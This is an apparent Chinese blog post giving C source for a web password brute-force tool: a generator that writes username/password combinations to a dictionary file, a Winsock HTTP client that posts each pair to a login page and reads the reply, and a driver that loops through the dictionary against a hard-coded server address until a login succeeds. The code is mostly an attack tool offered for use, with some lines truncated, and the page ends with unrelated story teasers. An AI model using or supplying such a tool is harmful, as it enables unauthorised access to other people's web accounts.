2019-11-11

基于网页的口令攻击的实现

 1、攻击字典实现(简单实现,在已知口令位数前提下,且限制字典库口令数目):

#include

#include

#include

#define USERLEN 7

#define PASSLEN 9

#define SIZEOFTABLE 63

static char table[SIZEOFTABLE] = "1234567890QWERTYUIOPqwertyuiopasdfghjklASDFGHJKLmnbvcxzZXCVBNM";

int jinweiadd(int &count)

{

count++;

if(count==SIZEOFTABLE)

{

count = 0;

return 1;

}

return 0;

}

void addcount(int count[16])

{

for(int i = 0;i<16;i++)

{

if(jinweiadd(count[i]) == 0)

break;

}

}

//

void makeone_usps()

{

unsigned test=0;

char userpas[40]={0};

char *qian = "username=";

char *hou = "&password=";

int count[16] = {0};//做计数的数组

FILE *fp;

char *filename = "./字典.txt";

int j=0,t=0;

char user[8];

char pas[10];

int i = 0;

char huiche[2] = {'\r','\n'};

fp = fopen(filename,"wb");

while(1)

{

//chanshengbingchucun

for(j=0;j<7;j++)

{

user[j]=table[count[j]];

}

user[j] = 0;

for(j=8;j<17;j++)

{

pas[j-8]=table[count[j-1]];

}

pas[j-8] = 0;

for(t=0;t<9;t++)

{

userpas[t] = qian[t];

}

for(;t<16;t++)

{

userpas[t] = user[t-9];

}

for(;t<26;t++)

{

userpas[t] = hou[t-16];

}

for(;t<36;t++)

{

userpas[t] = pas[t-26];

}

fwrite(userpas,sizeof(char),35,fp);

fwrite(huiche,sizeof(char),2,fp);

if(count[15]==SIZEOFTABLE-1)

break;

 addcount(count);

 test++;

 if(test==0xfffffff)

 break;

}

fclose(fp);

}

void getone_usps(char usrpas[],unsigned long &count)//count是从零开始的

{

unsigned long i=0;

char mid;

FILE *fp;

char *filename = "./字典.txt";

fp = fopen(filename,"rb");

while(i

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\n')

i++;

}

for(i=0;i<65;i++)

{

usrpas[i]=0;

}

for(i=0;i<65;i++)

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\r')

break;

usrpas[i]=mid;

}

fclose(fp);

count++;

}

2、HTTP协议实现客户端:

#include

#include

#pragma comment(lib,"ws2_32.lib")

int compare(char buffer[])

{

unsigned int i=0x182;

for(;i<1024;i++)

{

if((buffer[i]=='r')&&(buffer[i+1]=='e')&&(buffer[i+2]=='d'))

break;

i++;

}

if(i==1024)

return 1;

i+=8;

unsigned int a=(unsigned int)buffer[i]&0xff;

unsigned int b=(unsigned int)buffer[i+1]&0xff;

if(a==0xb2)

if(b==0xbb)

return 0;

return 1;//代表匹配

}

int testonce(char *usrpas,char ServerIPAddr[],int ServerPort)

{

int flag = -1;

FILE *fp;//,*fp1,*fp2;

int i=0,j=0;

//WSAData 数据结构

WSADATA wsaData;

//客户端套接字句柄

SOCKET ClientSocket;

//服务器地址

SOCKADDR_IN ServerAddr;

//发送数据

char SendData[1024];

fp = fopen("./前奏.txt","rb");

while(!feof(fp))

{

fread(&SendData[i],sizeof(char),1,fp);

i++;

}

i--;

int midsize = strlen(usrpas);

for(j = 0;j

{

SendData[i] = usrpas[j];

i++;

}

SendData[i] = 0;

fclose(fp);

char ReceiveBuffer[1024] = "";

int SendLength = -1;

int Result = -1;

//初始化 Winsock

if((Result = WSAStartup(MAKEWORD(2,2),&wsaData))!=0)

{

printf("WSAStartup 失败!错误代码:%d\n",Result);

return -1;

}

ClientSocket = socket(AF_INET,//协议族

SOCK_STREAM,//流套接字类型

IPPROTO_TCP);//TCP协议

if(ClientSocket<0)

{

printf("socket 失败!错误代码:%d\n",WSAGetLastError());

return -1;

}

memset(&ServerAddr,0,sizeof(ServerAddr));

//填充SOCKADDR_IN

//用来表示服务器的IP和端口

//协议族类型为AF_INET

ServerAddr.sin_family = AF_INET;

//设置服务器端口号

ServerAddr.sin_port = htons(ServerPort);

//设置服务器的IP地址

ServerAddr.sin_addr.s_addr = inet_addr(ServerIPAddr);

//连接服务器

Result = connect(ClientSocket,//套接字句柄

(SOCKADDR*)&ServerAddr,//服务器地址

sizeof(ServerAddr));//地址结构长度

if(Result<0)

{

printf("连接失败!错误代码:%d\n",WSAGetLastError());

return -1;

}

//发送数据

SendLength = send(ClientSocket,//套接字句柄

SendData,//发送数据缓冲区

strlen(SendData),//长度

0);//标志为0

if(SendLength<0)

{

printf("发送失败!错误代码:%d\n",WSAGetLastError());

return -1;

}

//else

//printf("发送数据为:%s\n",SendData);

int ReceiveLen;

//清零

memset(ReceiveBuffer,0,sizeof(ReceiveBuffer));

//接收数据

if((ReceiveLen = recv(ClientSocket,ReceiveBuffer,1024,0))<0)

{

printf("接收失败!错误代码:%d\n",WSAGetLastError());

return -1;

}

else

{

//printf("接收数据为:%s\n",ReceiveBuffer);

if(compare(ReceiveBuffer)==1)

flag=1;

}

if(closesocket(ClientSocket)==SOCKET_ERROR)

{

printf("关闭socket失败错误代码是%d\n",WSAGetLastError());

}

//释放Winsock

if(WSACleanup() == SOCKET_ERROR)

{

printf("释放Winsock失败错误代码是%d\n",WSAGetLastError());

}

return flag;

}

3、三次握手验证口令:

#include "Httptest.h"

#include "dic.h"

#include

int semfile1 = 0;

int semfile2 = 0;

unsigned long count=0;

int threadnum=0;

int numcount=0;

int success = 0;

char result[90];

int threadend=0;

DWORD WINAPI thread(LPVOID ptheread)

{

while(success ==0)

{

system("cls");

if(success !=0)

break;

printf("wait.");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait..");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait...");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait....");

_sleep(250);

}

system("cls");

return 1;

}

void main()

{

char usrpas[65]="";

char ServerIPAddr[50] = "10.0.0.25";

int ServerPort = 80;

unsigned long numofdic=13;

DWORD threadid;

CreateThread(0,0,thread,0,0,&threadid);

while(count

{

getone_usps(usrpas,count);

int flag = testonce(usrpas,ServerIPAddr,ServerPort);

if(flag==1)

{

success = 1;

//printf("成功密码为%s\n",usrpas);

break;

}

}

if(count == numofdic)

success = 2;

_sleep(500);

if(success == 1)

printf("成功密码为%s\n",usrpas);

else

printf("字典库中无合适的用户名密码\n");

return;

}

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,236评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,867评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,715评论 0 340
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,899评论 1 278
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,895评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,733评论 1 283
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,085评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,722评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,025评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,696评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,816评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,447评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,057评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,009评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,254评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,204评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,561评论 2 343

推荐阅读更多精彩内容